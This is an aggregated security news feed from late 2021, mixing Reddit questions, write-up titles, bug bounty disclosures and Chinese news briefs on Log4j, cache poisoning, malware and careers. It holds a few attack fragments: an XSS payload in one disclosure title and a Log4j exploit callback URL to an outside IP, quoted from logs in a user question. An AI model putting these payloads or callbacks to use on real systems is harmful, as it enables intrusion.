    Hi there, I'm setting up gSuite and need some advice here. Use case requirements: operations team member will have access to customer data on Google Drive, so we want to enforce those team members to only view such data via corporate VPN. Our sales team members do not have access to customer data, so we do not want them to login via VPN because that's extra friction. ​ After researching online, I found two ways of doing this: a. Using the context aware access feature from gSuite https://support.google.com/a/answer/9275380?product_name=UnuFlow&hl=en&visit_id=637758886340041076-3475162686&rd=1&src=supportwidget0&hl=en Pro: set up seems straightforward, and can configure based on teams Con: pay more per user, it's like $8 more per user to our current edition b. Set up gSuite to login with Okta via SAML, and then configure Okta log on policies to require VPN for certain users https://support.google.com/a/answer/6369487?product_name=UnuFlow&hl=en&visit_id=637758886340041076-3475162686&rd=1&src=supportwidget0&hl=en#zippy=%2Csso-usernetwork-mapping-matrix Pro: Saves money, get more familiar with SAML which seems useful? Questions for experts here about this approach: Is it easy to quickly provision which users are required to login via Okta and VPN? Anything we should be careful about? The process seems quite complicated. How much time will it take? Technically how is this different from option a? I guess gSuite does all the configuration automatically for you to save the time? ​ Which one would you advise us to go for? Any thoughts are tremenduously appreciated! submitted by /u/johnestar [link] [comments]  ( 2 min )
    Is it possible to put SSO like Okta behind VPN?
    Hi there, I'm wondering is it possible to put Okta behind VPN. If employees are not connected to company VPN, login via Okta should fail. How should I enable this? submitted by /u/johnestar [link] [comments]  ( 1 min )
    Threat Research
    I’m looking into getting into a threat research position and have a few questions: 1) average workload/what to expect 2) what certs/projects would help me get into a position like this 3) any advice from anyone in this type of role I currently do analyst/threat hunting work so I have some experience but hate my current job due to soc grind and burnout. I enjoy active defense topics like honeypots and I think a research role is better suited. MA and phishing analysis is always a fun time for me submitted by /u/blue_Kazoo82 [link] [comments]  ( 1 min )
    Home Networking
    Hello everyone, soon I will be moving out of my parents house, and I'm interested on the topic of home networking, security and privacy. Here are my plans, currently for the last 4 years I've fully switched to GNU/Linux and even switched my phone OS to a privacy respecting one (GrapheneOS). I plan on having a server that will have Jellyfin on it accessed remote via Caddy (Reverse Proxy), NextCloud as an alternative to Google Drive/Google Photos, and an OpenVPN connection to my home network and PiHole. My main concern is that I would like to build a separate gaming PC that will run Windows, also if I have friends over they would need WiFi. Is it possible to separate my home network into 3 smaller networks with seperate SSID's that won't communicate between eachother (basically what I'm asking is it possible to have separate networks for guests and me ? ​ I would have some IoT devices such as a smart TV but is it possible to filter it out in ACL so that the TV only has LAN but can't connect to the internet ? Since I'm moving out it will be a great learning experience to make my home network. Now I have a few questions and I hope some of you lovely people could answer them. Keep in mind I'm focused on privacy and security mostly here. Which router should I go for ? Which model is the best, should I go for OpenWRT ? Should I get a L3 switch ? If so what model would be the best ? Is it possible to separate my home network into smaller ones that won't communicate between each other (guest, my personal and IoT LAN devices) ? Well that's all the questions I have, thank you in advance. ​ EDIT: I forgot to add this I would need WiFi so that means I would need some WiFi Access Points, which models should I look for ? submitted by /u/throwaway89722316 [link] [comments]  ( 1 min )
    Should I be worried about non-financial hacks when assessing my security?
    So whenever I analyse my personal security, both cyber and IRL, I always look at my finances and ask "How could a hacker steal any of my funds?", so it usually defaults to me running through my financial accounts and seeing what it would take for a hacker to hack into those accounts and steal the funds. I feel if I run through all the places where my money is and check them off, I should be good, but I wonder - are there other things I should be worried about also? What's the worst that could happen if one of my non-financial accounts is hacked into? submitted by /u/EnterShikariZzz [link] [comments]  ( 3 min )
    Just had my first cyber security interview
    Hi, I am an MIS student who just finished college. Unfortunately i have to do one year of military service,i will be 25 1/2 or 26 when i finish. There is a gap between me as a mis student and cs students. Thankfully it wasn’t as big as i thought. The interviewer liked my python skills and reverse skills. However he told me i need to strength my networking and web skills and told me to study compitaA+ and compita security . Told me if i want to study malware analysis i should study architecture and os. The interviewer liked that i am a geek the most part and although it isn’t my major i kept studying security and exploitation. Between the time of my service and now i should start studying networks ,web,os,and architecture. So couple of questions now . 1-I I have an ardunio,can i study OS and architecture from it ? 2-He told me to apply again after finishing these courses but the cyber security isn’t demanded in the labor market of my country yet. So i was thinking of working remotely till then,any advices on that? I was thinking of hackthebox and ranking up to apply for jobs on there. submitted by /u/Ramseesthe4th [link] [comments]  ( 2 min )
    Currently making 60k CAD in Montreal as a cybersecurity analyst, am I underpaid ?
    Hi everyone, I'm currently working as the sole Cybersecurity Analyst for a construction company in Montreal, making 60k per year + 4% bonus. 2 years of experience in IT in general. I'm wondering if I'm currently underpaid ? And how much should I expect if I jump ship next year. Thanks. submitted by /u/gateau_a_la_creme [link] [comments]  ( 4 min )
    Why are Port 6666 (irc) and Port 8443 (https-alt) exposed on my wan interface?
    I recently got my hands on a static IP from my ISP and was playing around with nmap when I noticed that booth port 6666 and 8443 are open. I never used any kind of software related to irc. I have a laptop running Ubuntu, a Xbox and 2 iPhones on my network. I think the culprit might be my Asus router as I checked my laptops firewall setup without any leads. Disabling UpnP doesn’t do anything. Should I be worried? Looking up port 6666 brings up a lot of scary sounding results. submitted by /u/Echiketto [link] [comments]  ( 1 min )
  • Open

    Hook Heaps and Live Free
    submitted by /u/dmchell [link] [comments]
    BLISTER malware campaign discovered
    submitted by /u/dmchell [link] [comments]
  • Open

    Cyber Detective OSINT CTF “Life Online” Writeup
    The Cyber Society at Cardiff University runs Cyber Detective CTF, a free OSINT CTF. I started with the “Life Online” challenges, which… Continue reading on Medium »  ( 4 min )
    Viaggio all'interno delle recensioni 5 stelle di Amazon
    Tra intermediari e DataLeak Continue reading on Medium »  ( 3 min )
    How To Hack Any Website
    [Part — 2: Content Discovery] Continue reading on Medium »  ( 3 min )
  • Open

    Wrote a tool to verify whether a simple Java webapp is vulnerable to CVE-2021-44228 given a version of Log4J, Java and possibly some mitigations.
    submitted by /u/One_Explanation_4076 [link] [comments]  ( 1 min )
    RF Bugs and their detection using Software-Defined Radio
    submitted by /u/sebazzen [link] [comments]
    Examining Log4j Vulnerabilities in Connected Cars and Charging Stations
    submitted by /u/sebazzen [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2021-12-23 Review
    基于大数据技术的攻击溯源研究 by ourren Java代审1:Maven基础知识 by jinxing 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2021-12-23 Review
    基于大数据技术的攻击溯源研究 by ourren Java代审1:Maven基础知识 by jinxing 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Detecting NTDS.DIT Theft - ESENT Event Logs
    Merry Christmas and Happy Holidays! In this 13Cubed episode, we'll take a look at the value of ESENT Event Logs in detecting potential theft of NTDS.DIT. Episode: https://www.youtube.com/watch?v=rioVumJB0Fo Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]  ( 1 min )
    forensic image infected analysis
    I would like to ask what if i got usb with image from someone for analysis and i found that the usb is infected. what should i do to start analyzing it (connect to my lab (FRED) or install mys tools on vm for analysis or what? submitted by /u/ma7moodso7eem [link] [comments]  ( 1 min )
  • Open

    Log4j vulnerability resource center
    Watch this space for the latest news and resources from Invicti on the Log4j crisis. READ MORE  ( 2 min )
  • Open

    How I Get $1350 From IDOR Just Less 1 hours
    Assalamualaikum, wr,wb , Continue reading on Medium »  ( 2 min )
    Cross-Site Request Forgery — CSRF
    What is Cross-Site Request Forgery ? Continue reading on Medium »  ( 4 min )
    Information Disclosure on CodePolitan
    Hello everyone, in this opportunity i will share a brief summary of the information disclosure bug that i found on the CodePolitan… Continue reading on System Weakness »  ( 2 min )
    Information Disclosure on CodePolitan
    Hello everyone, in this opportunity i will share a brief summary of the information disclosure bug that i found on the CodePolitan… Continue reading on Medium »  ( 1 min )
    AppSec Series 0x04: Crowdsourcing Security
    More than a decade ago, Jeff Howe defined a phenomenon that has gone unnoticed for a long time: “Non professionals contribute to the… Continue reading on The Startup »  ( 6 min )
  • Open

    FreeBuf早报 | 中国首套“新闻数字藏品”发行;《舞力全开》用户数据遭泄露
    新华社在今天发行中国首套“新闻数字藏品”NFT。  ( 1 min )
    疑似“肚脑虫”APT组织近期针对孟加拉国的攻击活动分析
    Donot“肚脑虫”是疑似具有南亚背景的 APT 组织,其主要以周边国家包括巴基斯坦、孟加拉国、尼泊尔和斯里兰卡的政府和军​​事为目标进行网络攻击活动。  ( 1 min )
    “杀不掉”的“虚灵矿工”——门罗币挖矿木马分析报告
    该挖矿木马在文件末尾附加了大量空字节、使自身大小达到百MB级别,从而达到杀软和沙箱检测逃逸的目的。  ( 1 min )
    K-12教育应用存在“严重安全风险”
    K-12教育使用的许多应用程度存在各种严重的安全问题,其中包括可能导致学生数据“不受监管和失控”地分享给广告公司。
    美国最新的Hack DHS漏洞赏金计划已包含log4j相关漏洞
    为了应对最近发现的 log4j 漏洞,部门正在扩大Hack DHS漏洞赏金计划的范围,包括额外的激励措施,以发现和修补系统中与log4j有关的漏洞。  ( 1 min )
    Microsoft Teams 允许网络钓鱼漏洞,自3月至今未被修复
    Microsoft Teams 是一款基于聊天的智能团队协作工具,可以同步进行文档共享、语音、视频会议等即时通讯功能。  ( 1 min )
    调查显示,60%项目中带有已知漏洞未打补丁的软件可让攻击者进一步渗透
    来自数十项渗透测试和安全评估的数据表明,几乎每个组织都可能被网络攻击者渗透。
  • Open

    [project]Gain Access to the Target System using Trojans
    Lab1 :Gain control over a victim machine using the njRAT RAT Trojan Continue reading on Medium »  ( 1 min )
    Beyond Long4j: A Twitter Spaces Summary
    In the latest Long4j Twitter spaces discussion, @syndrowm from the team at RandoriAttack, Laughing Mantis and MG, led a community-wide… Continue reading on Medium »  ( 2 min )
  • Open

    Logback RCE Vulnerability
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2021-42550 Comments URL: https://news.ycombinator.com/item?id=29659429 Points: 2 # Comments: 1  ( 3 min )
  • Open

    Hello everyone, question directed at people who have experience working in this field of exploit dev/ reversing
    Do u have to be an expert in other things like web security/pen testing for example. I enjoy doing reversing and finding bugs and exploiting them(still learning) and was wondering if there are other skills that someone needs to be an expert in before landing a job in this field. I do have a lot of the basics down in web security and networking but I’ve always found those pretty boring and I never really enjoy the process as much as I do from reversing and looking for things to exploit in binaries or operating systems. A lot of the security jobs out there tend to be very vague in the job description. I’m not laser focused into getting a job in this field as I’m still a software engineer and do this as a hobby but if I ever get the opportunity I would gladly take it. submitted by /u/BetaPlantationOwner [link] [comments]  ( 1 min )
  • Open

    How “assertions” can get you Hacked !!
    A deep dive into the assert() function and ways to exploit it!  ( 6 min )
  • Open

    How “assertions” can get you Hacked !!
    A deep dive into the assert() function and ways to exploit it!  ( 6 min )
  • Open

    How “assertions” can get you Hacked !!
    A deep dive into the assert() function and ways to exploit it!  ( 6 min )

  • Open

    ZAP과 Burpsuite에서 feedback 정보를 수집하지 못하도록 제한하기
    최근에 ZAP의 Core addon 중 하나인 Callhome이 업데이트 되었습니다. 기존에 Callhome은 단순히 메인에 News 정보를 보여주기 위해 만들어진 기능인데, 이번에 Telemetry 관련 부분이 추가됬습니다. Telemetry는 ZAP 사용성 정보등을 수집하기 위한 기능인데요, ZAP쪽 설명으로는 취약점이나 개인정보 등은 수집하지 않고 단순 통계 정도만 수집한다고 합니다. 어쨌던 저처럼 이런 정보 수집에 민감하신 분들은 별도로 Disable 처리 하셔야할 것 같습니다. (Burpsuite는 오래전부터… 😱) 오늘은 겸사겸사 ZAP과 Burpsuite에서 이러한 사용성 정보를 수집하는 이유와 이를 Disable 하는 방법에 대해 정리해둘까 합니다.
  • Open

    Cache Poisoning DoS on downloads.exodus.com
    Exodus disclosed a bug submitted by youstin: https://hackerone.com/reports/1173153 - Bounty: $2500
    Static files on HackerOne.com can be made inaccessible through Cache Poisoning attack
    HackerOne disclosed a bug submitted by youstin: https://hackerone.com/reports/1181946 - Bounty: $2500
    Cache poisoning Denial of Service affecting assets.gitlab-static.net
    GitLab disclosed a bug submitted by youstin: https://hackerone.com/reports/1160407 - Bounty: $4850
    Cache Poisoning DoS on updates.rockstargames.com
    Rockstar Games disclosed a bug submitted by youstin: https://hackerone.com/reports/1219038 - Bounty: $500
    photo-test.gb.ru ()
    Mail.ru disclosed a bug submitted by rivalsec: https://hackerone.com/reports/1257091
    Rxss on via logout?service=javascript:alert(1)
    U.S. Dept Of Defense disclosed a bug submitted by xko2x: https://hackerone.com/reports/1406598
  • Open

    Tried making bootable Caine OS usb from rufus and balena etcher non of them were bootable, how do you fix missing partition error?
    submitted by /u/thecirclingfly [link] [comments]  ( 1 min )
    Collating a Team
    Hi, I'm curating interested parties into a voluntary investigative team using forensic architecture and Bellingcat OSINT techniques to represent data and events which occurred under the Mahamat Said Abdel Kani reign in CAR. I would like to compile a report and subsequent video detailing the key atrocities that were committed under this reign, how they were carried out, and the impact on the victims. This report will hopefully be evidenced to the ICC, but would also be for personal exhibition to all contributors. Message me if you're interested :) submitted by /u/bg0203 [link] [comments]  ( 1 min )
    How do you boot Caineos from usb
    just downloaded caine os, but caine11.0.iso does not have a boot file computer boots into black screen when booting from usb submitted by /u/thecirclingfly [link] [comments]  ( 1 min )
  • Open

    Log4j vulnerability: LaTeX is not affected
    Article URL: https://www.latex-project.org/news/2021/12/21/log4j-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29656288 Points: 3 # Comments: 0  ( 1 min )
    Azure App Service vulnerability exposed hundreds of source code repositories
    Article URL: https://www.wiz.io/blog/azure-app-service-source-code-leak Comments URL: https://news.ycombinator.com/item?id=29655594 Points: 4 # Comments: 0  ( 5 min )
    Apache Log4j Vulnerability Guidance
    Article URL: https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance Comments URL: https://news.ycombinator.com/item?id=29653370 Points: 1 # Comments: 0  ( 5 min )
    Bug bounty platforms handling thousands of Log4j vulnerability reports
    Article URL: https://portswigger.net/daily-swig/bug-bounty-platforms-handling-thousands-of-log4j-vulnerability-reports Comments URL: https://news.ycombinator.com/item?id=29651771 Points: 1 # Comments: 0  ( 5 min )
    Acronis Vulnerability Scan Reliability
    is the Acronis vulnerability scan reliable? it detects my docker, python, apple music have vulnerability. Comments URL: https://news.ycombinator.com/item?id=29648153 Points: 1 # Comments: 0
    Current 0-day vulnerability on FreePBX
    Article URL: https://community.freepbx.org/t/0-day-freepbx-exploit/80092 Comments URL: https://news.ycombinator.com/item?id=29646626 Points: 37 # Comments: 6  ( 6 min )
    Log4j Vulnerability (Log4Shell) Explained – For Java Developers [video]
    Article URL: https://www.youtube.com/watch?v=uyq8yxWO1ls Comments URL: https://news.ycombinator.com/item?id=29643836 Points: 3 # Comments: 0
  • Open

    Ultimate Reconnaissance RoadMap for Bug Bounty Hunters & Pentesters
    Advanced Reconnaissance and Web Application Discovery RoadMap to Find Massive Vulnerabilities. Continue reading on Medium »  ( 5 min )
    Shopify Plugin Bypass using Client-side injection thru API Implementation Vulnerability
    Hi, I am Kurt Russelle Marmol doing bug hunting for more than a year, and this is my first bug bounty write-up about my findings. Continue reading on Medium »  ( 2 min )
    Learn365 Challenge Review & Year 2021 in a Nutshell
    Learning is an essential factor irrespective of your domain, level of expertise and experience. It helps one to constantly improve their… Continue reading on Medium »  ( 3 min )
    How to be a Bug Bounty Hunter
    Hello guys, in this article I’m going to share some tips on how to become a successful bug hunter. I´m Octavian, a network engineer by day… Continue reading on Medium »
    Share and Win $BUSY!
    Steps to follow: Continue reading on BusyTechnology »
    A guide to our dApp and benefits for our users
    With the launch of our testnet and bugbounty programme, we would like to give our community a brief on our dApp and the various services… Continue reading on Medium »  ( 2 min )
    A Hacker’s Guide to Submitting Bugs on Immunefi
    Many whitehat hackers and bug bounty hunters who discover Immunefi already have some experience under their belt. They’ve often submitted… Continue reading on Immunefi »  ( 8 min )
    How I was able to bypass WAF and find the origin IP and a few sensitive files
    Hello hunters, Continue reading on Medium »  ( 1 min )
    Campaign | Announcing Parami Protocol’s Bug Bounty Program
    Parami is offering $500,000 AD3 for bug hunters! Continue reading on Medium »  ( 2 min )
  • Open

    [Buffer Overflow] Looking for help for a ROP issue
    Hello ! ​ I am currently applying (learning purpose) the following tutorial about a ROP-based buffer overflow inside my Kali VM: https://www.dailysecurity.fr/return_oriented_programming/ ​ However i m unable to reproduce the same behavior and get a shell... ​ I m currently debugging with Peda GDB and have seen strange things such as a SIGSEGV fault. ​ I m a beginner and don't feel comfortable with some points: - does my EIP during the SIGSEGV is correct ? It looks like to be not in vmmap ranges (0x7... instead of 0x8...). - Moreover "Leak scanf" has a strange value interpreted as string "JHmp" - Why there are values in my stack between gadget_pop_ebx and /bin/bash instead of just padding+leak_system+gadget_pop_ebx+leak_binsh ? - When invoking "Leak system" with "SHELL=/bin/bash" does it work with prefix "SHELL=" ? Or need another string ? - In comments someone said he had an issue with scanf interpreting space 0x20 but after checking address I think I m not concerned. Just maybe "Leak scanf" has 0x0a in the address could generate an error ? ​ Could you help me to understand why it doesn't work ? I have attached screenshots with values of the stack, registers, etc to help your understanding (The GDB break is located to the RET of vuln() function to follow the ROP chain with the overwriting of "saved eip") ​ Many thanks !! ​ Update: ​ I have updated my libc and it works fine now... Still don't understand why it didn't work before. ​ Screenshots: https://ibb.co/VmGxwC4 https://ibb.co/SPy5jNb https://ibb.co/PmMRbf0 https://ibb.co/3vHkT9Q submitted by /u/Oni_Nephilim [link] [comments]  ( 1 min )
    How do you tolerate how buggy and trash bettercap is?
    Do you just use ettercap-ng? Do the old tools work just as well as bettercap's lame ass does? submitted by /u/master-berator [link] [comments]  ( 1 min )
    Did I find proof of major hack vector possibly? Macbook
    Hi everyone, Would like a quick opinion- suffered a 6 fig hack of multiple crypto wallets in Sept. I was checking the console of my macbook for any access events or really anything at all just in case and I saw these logs from August (~7-12 days before the hack on Sept 2nd) that look like reference to some update and looks like an iPhone is possibly involved? Not sure. The vector was likely a file on my computer (not online) holding seed phrases. I didn't update my iPhone or connect my iPhone to my macbook to update at any point during that timeframe as far as I can remember. Is it possible someone on a shared network could use an iPhone to somehow access private files and data on my macbook? Or otherwise, any idea what these console events could be regarding? I am already working with US secret service on the actual tracking of the stolen crypto funds. We were not able to find the vector of the breach of private data however. Wondering if this is info that is a clue? Imgur Thanks submitted by /u/Intel81994 [link] [comments]  ( 1 min )
    Microsoft Azure Bug Leaks Linux Source Code Repository
    A cloud security vendor, Wiz.io discovered a four years old bug in the Microsoft Azure App Service that exposed the source code of customer applications written in PHP, Python, Ruby, or Node, that were deployed using “Local Git”. The vulnerability, dubbed as “NotLegit”, has existed since September 2017 and has probably been exploited in the wild. The issue resides in the Azure App Service, when users use the “Local Git” deployment method to deploy to the Azure App Service, the .git folder gets created in the content root, which puts their data and source code at risk for information disclosure. This behavior of Azure App Service via Local Git was known to Microsoft and the company added a “web.config” file to the .git folder within the public directory that restricted public access. How…  ( 2 min )
    "Find My Phone" went off on my phone, but I didn't activate it??
    Is this a normal thing, or could something weird be going on? I have my own wifi with a custom password. submitted by /u/SeaCommunication11 [link] [comments]  ( 1 min )
    Network Streaming Analytics With IoT
    What are threads can identify on packet sniffer? submitted by /u/Sangeeth17 [link] [comments]
    What's the main difference in Linux and UNIX? (read post)
    I'm studying about Linux systems in University now. And I'm pretty confused if Linux and UNIX are two different entities cuz my college professor seems to use these terms interchangeably and creating all this massive chaos between these two lol. So I did some research at my own to see the difference but the results were quite confusing at first glance, so now I want yall to give me correct answer, are they both same or different???? submitted by /u/The_Intellectualist [link] [comments]  ( 4 min )
    Log4j: Is the IP in this callback URL known as a serious attacker or just a PoC?
    Imgur wont let me upload a pic, so here's the callback URL I found in an IPS log (dated Dec 11): ldap://45.130.229.168:1389/Exploit This looks a lot like just a copy-pasted log4j PoC. Or has anybody been seriously compromised by this IP? submitted by /u/e_hyde [link] [comments]  ( 1 min )
    Best way to wipe external hard drive securely on windows?
    I still need to use the drive after so physical destruction is not an option. I need to remove the data completely so that recovery software won't be able to recover anything. I don't think just formating the drive will be enough. I've heard of DBAN but it seems more for internal drive and I'm paranoid that might accidentally wipe my internal drive instead. submitted by /u/snkhuong [link] [comments]  ( 3 min )
    Network Streaming Analytics With IoT
    Hello Everyone, I am requesting you to fill this survey. it will help me to archive my final year research project. this project is based on developing network streaming analytics in nearly real-time with IoT devices. link is given below. Thanks. https://docs.google.com/forms/d/e/1FAIpQLSeXVeRCn43xodLsY86RK226Nhkq3A0CVS7HLyaaPNOv1VOSeg/viewform?usp=sf_link submitted by /u/Sangeeth17 [link] [comments]
    help a newbie understand what's happening with https & SSL/TLS question.
    Hello all, I'm a little confused on https and SSL/TLS. I set up a service and Nginx reverse proxy manager. I have a domain with Cloudflare. I used letsencyrpt ssl certs when adding the host to my proxy manager. In Cloudflare I'm using full SSL/TLS encrypt setting. When I go to my service outside of my network it says not secure in the toolbar. I asked this question in another sub and was told it was okay. but I looked at Wireshark and was easily able to find my password in clear text :( What exactly is encrypted and when? ​ The service does work over https but it also wants me to point it to the PKCS #12 file. I download the certs from proxy manager and not sure what file to actually upload. I can get help on this question in that services sub later. Thank you for your help in advance. submitted by /u/Famous_Relative2500 [link] [comments]  ( 1 min )
    Do you speak at conferences?
    I'm curious about how people who speak at conferences got into it. I always associated them with senior level IT execs just trying to sell a product. But I learn that anyone could submit to speak. Those of you that regularly speak at conferences, I'd love to hear more about how you got into it... What year did you start speaking at conferences? What was your first presentation about? What got you into it?Why did you start? What keeps you going with being a presenter? How have your presentations evolved over time? How have you evolved as a speaker over time? What are you presenting on in recent history? Are you speaking in 2022? Of yes, what event(s)? submitted by /u/gnomeparadox [link] [comments]  ( 5 min )
  • Open

    On Writing DFIR Books, pt III
    Editing and Feedback When it comes to writing books, having someone can trust to give you honest, thoughtful, insightful feedback is a huge plus. It can do a lot to boost your confidence and help you deliver a product that you're proud of. When I first started writing books, the process of going from idea to a published book was pretty set...or so I thought, being new and naïve to the whole thing. I put together an idea for a book, and started on an outline; I did this largely because the publisher was asking for things like a "word count". Then they'd send me a questionnaire to complete regarding the potential efficacy of the book, and they'd send my responses to a panel of "experts" within the industry to provide their thoughts and insight. However, there wasn't a great deal of insight i…  ( 6 min )
  • Open

    Cross Examination: Unveiling JavaScript injection based browser fingerprint masking attempts
    submitted by /u/ziyahanalbeniz [link] [comments]
    Elastic Security disrupts new BLISTER campaign leveraging code signing certificates.
    submitted by /u/expertsnowboarder [link] [comments]
    Cloud Web Application Firewall (WAF) CyberRisk Validation Comparative Report
    submitted by /u/markcartertm [link] [comments]
    Vulnerabilities in the Abode IOTA security system (fixed as of Dec 17th 2021)
    submitted by /u/jaymzu [link] [comments]
    Microsoft Teams: 1 feature, 4 vulnerabilities
    submitted by /u/breakingsystems [link] [comments]  ( 1 min )
    intuitive advanced cryptography [PDF]
    submitted by /u/netfortius [link] [comments]
    Responder and IPv6 attacks - Inject a DNS suffix on Active Directory via IPv6 DNSSL
    submitted by /u/Gallus [link] [comments]  ( 1 min )
    Why it's hard to fix the Java ecosystem
    submitted by /u/Jazzlike-Vegetable69 [link] [comments]  ( 1 min )
  • Open

    How I found the Authentication Bypass bug and Earn $$$$
    Hi all,  ( 3 min )
    How I Found My First XSS Bug and Earn $$$
    Hi everyone,  ( 3 min )
    Account takeover by tampering the Signup verification token .
    Hello People ,  ( 3 min )
    Accessing Thousands of Covid-19 Patients Confidential Information. [CVE-2020–35276]
    Hey there, Yash Here, I’m noob BB Hunter & Security researcher from India.  ( 2 min )
    ECDSA/ECC digital certificates and other stuff not everyone is using
    Elliptic Curve Cryptography Digital Certificates Continue reading on InfoSec Write-ups »  ( 2 min )
    Tackling CVE-2021–41277 Using a Vulnerability Database
    In this article, I’ll talk about a security vulnerability (CVE-2021–41277), which has been popular in the InfoSec committee recently. I’ll…  ( 5 min )
  • Open

    How I found the Authentication Bypass bug and Earn $$$$
    Hi all,  ( 3 min )
    How I Found My First XSS Bug and Earn $$$
    Hi everyone,  ( 3 min )
    Account takeover by tampering the Signup verification token .
    Hello People ,  ( 3 min )
    Accessing Thousands of Covid-19 Patients Confidential Information. [CVE-2020–35276]
    Hey there, Yash Here, I’m noob BB Hunter & Security researcher from India.  ( 2 min )
    ECDSA/ECC digital certificates and other stuff not everyone is using
    Elliptic Curve Cryptography Digital Certificates Continue reading on InfoSec Write-ups »  ( 2 min )
    Tackling CVE-2021–41277 Using a Vulnerability Database
    In this article, I’ll talk about a security vulnerability (CVE-2021–41277), which has been popular in the InfoSec committee recently. I’ll…  ( 5 min )
  • Open

    How I found the Authentication Bypass bug and Earn $$$$
    Hi all,  ( 3 min )
    How I Found My First XSS Bug and Earn $$$
    Hi everyone,  ( 3 min )
    Account takeover by tampering the Signup verification token .
    Hello People ,  ( 3 min )
    Accessing Thousands of Covid-19 Patients Confidential Information. [CVE-2020–35276]
    Hey there, Yash Here, I’m noob BB Hunter & Security researcher from India.  ( 2 min )
    ECDSA/ECC digital certificates and other stuff not everyone is using
    Elliptic Curve Cryptography Digital Certificates Continue reading on InfoSec Write-ups »  ( 2 min )
    Tackling CVE-2021–41277 Using a Vulnerability Database
    In this article, I’ll talk about a security vulnerability (CVE-2021–41277), which has been popular in the InfoSec committee recently. I’ll…  ( 5 min )
  • Open

    SecWiki News 2021-12-22 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2021-12-22 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    FreeBuf早报 | 2easy暗网正在倾销窃取的数据;恶意程序Joker被下载50万次
    安全人员发现,一个名为“2easy”的暗网市场正在大幅倾销数据,这些数据是从约 600,000 台感染的设备上窃取。  ( 1 min )
    硅谷快速致富的新工作:加密初创企业
    更多人是被Web3的精神所吸引,寻求权力和决策的下放。  ( 1 min )
    直播回顾 | CIS 2021春日版议题预告直播继续与您相约~
    在冬至最长的夜里,近万人守候在FreeBuf直播间,观看CIS 2021春日版议题预告直播。  ( 1 min )
    漏洞危机爆发时,企业该做什么?
    有关安全漏洞事件,国家有一套详细的法律法规,约束相关企业“尽早申报”,协助相关行业的企事业单位即时“补漏”。
    一篇文章玩明白Stack-migration
    一篇文章玩明白Stack-migration.  ( 2 min )
    实用技能:域名解析故障排查的几种常见方法
    DNS域名解析是访问网站的重要环节之一。
    戴尔BIOS更新后可能导致电脑无法正常启动
    戴尔最近发布的BIOS更新在多个笔记本电脑和台式机型号上引起严重启动问题。  ( 1 min )
    《上海市建设网络安全产业创新高地行动计划(2021-2023年)》全文发布
    总的来说,《行动计划》共提出4项主要目标,3大建设高地,10项建设任务,以及7项保障措施。
    安全知识图谱 | 绘制软件供应链知识图谱,强化风险分析
    《践行安全知识图谱,携手迈进认知智能》精华解读系列第七篇,介绍了知识图谱相关技术如何在软件供应链安全领域应用。  ( 1 min )
    企业IoTOT网络安全现状
    在2021年发生了多起针对网络设备、监控系统、管道和水处理设施的知名网络攻击事件,使得大幅改进IoT/OT网络安全的需求变得更加明显。  ( 1 min )
    TikTok Live Studio 使用OBS源代码,违反GPL协议
    近日,有推特用户称TikTok最新上线的软件TikTok Live Studio疑似使用了OBS (Open broadcasting Software)的源代码,但是却没有遵守相关的开源许可条款。  ( 1 min )
    谷歌警告称,超过35000个Java包受 Log4j 漏洞影响
    谷歌扫描Maven Central Java软件包库,发现35863个软件包使用的Log4j库版本易受Log4Shell漏洞攻击。  ( 1 min )
    DNS Flood类型攻防梳理和思考
    重点针对攻击原理、防护原理进行说明,针对如何测试,提供参考。  ( 1 min )
    SIP协议报文攻击与防御
    攻击原理SIP(Session Initiation Protocol)是一个应用层的信令控制协议。用于创建、修改和释放一个或多个参与者的会话。这些会话可以是Internet多媒体会议、IP电话或多媒  ( 1 min )
    FreeBuf早报 | 阿里云被暂停工信部网络安全威胁信息共享平台合作单位;摩根员工使用加密应用被罚2亿美元
    全球各地麻烦事儿都不少,FreeBuf早报,安全早知道。  ( 1 min )
  • Open

    Google搜尋技巧 -只會關鍵字不夠,利用這7招強化搜尋力
    參考資料: https://support.google.com/websearch/answer/2466433 Continue reading on Medium »
  • Open

    dead birds
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    large chests
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
  • Open

    [CVE-2021–44855] Blind Stored XSS in VisualEditor media dialog at Wikipedia
    Assalamualaikum Bug Hunter & Hi Everyone Continue reading on Medium »  ( 2 min )

  • Open

    Can you recommend any tool for packet sniffing with the ability to filter traffic by processes?
    It should be a Linux tool (Windows as a last resort). It is desirable that it has the ability to decrypt SSL, TLS. The presence of a GUI will also be a big plus. All I want is to see which processes are sending which traffic. submitted by /u/vend_igo [link] [comments]  ( 1 min )
    Security experts of Reddit: In this paper it is claimed that, for $1400, a device can be constructed that intercepts cellular data. Is this still the case?
    *LTE data specifically Short Long submitted by /u/iExtrapolate314 [link] [comments]  ( 4 min )
    How do you curate the learning resources out there for cybersecurity?
    As a cybersecurity professional we always keep learning new things. The best part of the internet is that there's free and paid fees out there and there are many options. The worst part is also that there are so many option. So how to do curate if a resource (blog/lab like HackTheBox/wordlists/tools) is worth learning from? I have a huge list of resources. I've dipped my toe to see what fits but now I'm overwhelmed where to start because there are too many good resources. submitted by /u/writerlyhacker [link] [comments]  ( 1 min )
    Incident handling/response certs?
    have mixed feelings about certifications providing any real value but we have funds for a cert and I’m hoping to find a decent one that goes over the incident response lifecycle for our SOC. SANS is a bit too pricey, curious if anyone has any they would recommend. submitted by /u/freeridevt [link] [comments]  ( 1 min )
    Will attack such as LLMNR, NBT-NS and MDNS poisoner cause any issue to internal network?
    I've seen these kind of attacks are pretty common in any internal pentest tutorial. But is this save? Will it cause any issue to customer's network? submitted by /u/w0lfcat [link] [comments]  ( 1 min )
    What is the best way to log DNS when DoH is used?
